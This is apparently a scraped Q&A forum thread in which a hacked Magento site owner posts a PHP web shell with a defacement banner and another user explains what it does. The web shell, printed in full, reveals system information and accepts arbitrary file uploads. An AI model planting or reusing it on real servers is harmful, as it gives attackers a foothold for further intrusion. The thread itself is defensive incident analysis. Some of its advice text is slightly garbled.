My Magento site got hacked, what is this PHP code doing?
I just found some php file on my hosting, with 0.01% knowledge in php, can someone explain to me what this code does?
<?php if(isset($_GET["ourzr"])){
echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
echo"<form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>berhasil</b>-->".$_FILES["f"]["name"];
}else{
echo"<b>gagal";}
}
}?>
<title>Hacked by d3b~X</title>
<center>
<div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
<style>
body{overflow:hidden;background-color:black}
#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}
source to share
Code breakdown:
if the variable in the query string has a value (i.e. index.php?ourzr=set
)
<?php
if(isset($_GET["ourzr"])){
Then display information about your operating system on the server using the function php_uname()
. They use this information to target the next round of hacks to the specifics of your system.
echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
Create html form that allows more hack files to be uploaded
echo"<form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
If the file was downloaded, copy the files from the temp folder to a regular unnamed temp folder, but the original name
if($_POST["v"]==up){
if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>sucess</b>-->".$_FILES["f"]["name"];
}else{
echo"<b>failed</b>";
}
}
}
?>
This part is just a little message that says "I am a kool script kiddie from the gang of gangsters."
<title>Hacked by d3b~X</title>
<center>
<div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
<style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}
Output:
DELETE THIS FILE ASAP
This script was somehow uploaded to your server with some vulnerability that probably still exists (unless the hacker was good enough to fix it for you).
They found to get this one file on your server where they can access it, now they want to use it to continue downloading scripts and other malicious data. Delete this file and make sure your site downloads any type of file anywhere.
Next steps:
Read how hackers use file uploads to upload scripts like these and other things they can do with their own upload form: https://www.acunetix.com/websitesecurity/upload-forms-threat/
Read How to Create a Secure Boot Script: There are many other tutorials
Learn more about security and try to learn a little php. Let me know if you have more specific questions.
Track down this guy I think: https://twitter.com/d3b_x
source to share